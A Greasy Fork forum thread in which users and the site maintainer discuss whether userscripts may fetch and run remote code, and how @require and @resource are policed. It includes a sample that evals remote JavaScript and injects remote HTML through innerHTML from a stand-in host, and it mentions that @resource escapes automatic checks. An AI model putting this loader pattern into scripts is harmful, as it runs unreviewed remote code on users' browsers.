Greasy Fork

I was browsing topics and came across the following:

Is it possible to use "fetch()" in a script?
JasonBarnabe
To be clear, Greasy Fork does not allow running scripts from unauthorized places. If the content is just data though (like JSON), then it's fine.

Are @require & @resource monitored for such?

Examples based on actual userscripts on GF.

// @resource        remoteCode http://www.someSite.com/badJS.js
// @resource        remoteDom http://www.someSite.com/htmlWithBadJS.html


const js = GM_getResourceText('remoteCode');
eval(js);

const dom = GM_getResourceText('remoteDom');
element.innerHTML = dom;

https://greasyfork.org/en/help/code-rules

https://greasyfork.org/en/help/external-scripts

I think your code is okay, but if wasn't using // @resource it would be removed.

Are @require & @resource monitored for such?

@require is automatically monitored, @resource is not. There is no distinction between the two as far as the rules go, but the distinction is technical in that you can use @resource for non-script content, so it's not currently checked automatically.

// @resource remoteCode http://www.someSite.com/badJS.js

Not allowed according to the rules.

// @resource remoteDom http://www.someSite.com/htmlWithBadJS.html

Not allowed according to the rules (the HTML contains JS which is then executed).

As per your stats from Github, there are many scripts that use @resource for possibly executable content e.g.

  "cjs": 9,
  "js": 268,

  "html": 43,
  "xml": 3,
  "xul": 1,

Only in the case where:

• These contain executable script
• These are outside of the allowed sources
• These URLs are not for the same site the script affects

is it against the rules.